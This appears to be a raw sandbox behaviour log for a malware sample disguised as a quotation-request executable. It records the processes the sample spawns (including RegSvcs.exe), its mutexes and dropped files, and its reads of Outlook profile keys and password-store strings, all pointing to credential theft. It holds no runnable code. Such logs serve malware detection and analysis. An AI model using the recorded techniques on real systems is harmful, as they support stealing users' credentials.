              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile created: C:\Users\user\AppData\Roaming\713f49886881eab5.binJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-713f49886881eab59ea72c54-b
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-713f49886881eab5-inf
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-713f49886881eab57d8e3ee9-b
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeFile created: C:\Users\user\AppData\Local\Temp\autB16B.tmpJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegSvcs.exe, 00000002.00000002.2961862883.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B34000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2961862883.0000000002B25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeReversingLabs: Detection: 81%
              Source: unknownProcess created: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"
              Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
              Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
              Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
              Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
              Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
              Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
              Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
              Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
              Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
              Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
              Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
              Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
              Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
              Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exeSection loaded: webio.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: webio.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dllJump to behavior
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
              Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
              Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
              Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
              Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
              Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
              Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
              Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
              Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
              Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\msdtc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeStatic file information: File size 1553920 > 1048576
              Source: REQUEST FOR QUOTATION 1307-RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000003.1661345317.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000001.00000003.1918851926.0000000001F60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000001.00000003.1789345540.0000000002050000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000001.00000003.2033681360.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000001.00000003.2033681360.0000000000A00000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: vssvc.pdb source: WBEngine.0.etl.23.dr, VSSVC.exe.1.dr
              Source: Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000001.00000003.1724571249.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
              Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000001.00000003.1695308775.0000000002000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000001.00000003.2283149621.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2278981032.00000000008F0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000001.00000003.1731714155.0000000002080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.1.dr
